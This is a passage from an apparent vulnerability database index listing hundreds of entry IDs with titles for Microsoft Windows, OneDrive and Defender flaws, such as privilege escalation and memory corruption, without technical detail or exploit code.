privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160950] Microsoft OneDrive on Windows privilege escalation [160949] Microsoft OneDrive on Windows privilege escalation [160948] Microsoft OneDrive on Windows privilege escalation [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160930] Microsoft Windows up to Server 2019 fdSSDP.dll privilege escalation [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159590] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159583] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159581] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159580] Microsoft Windows Remote Desktop Gateway privilege escalation [159579] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159574] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159573] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159572] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159570] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159562] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159560] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159554] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159433] Microsoft Windows net use weak authentication [159426] Microsoft Windows VCF Card privilege escalation [159425] Microsoft Windows Group File privilege escalation [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157944] Microsoft Windows iSCSI Target Service privilege escalation [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157913] Microsoft OneDrive on Windows privilege escalation [157895] Microsoft Windows Defender MpSigStub.exe privilege escalation [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156396] Microsoft Windows Windows Installer privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156321] Microsoft Windows Defender privilege escalation [156320] Microsoft Windows Defender privilege escalation [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155162] Microsoft Windows Clipboard Service privilege escalation [155161] Microsoft Windows Clipboard Service privilege escalation [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155150] Microsoft Windows GDI information disclosure [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153289] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153260] Microsoft Windows Graphics Component information disclosure [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153224] Microsoft OneDrive on Windows privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 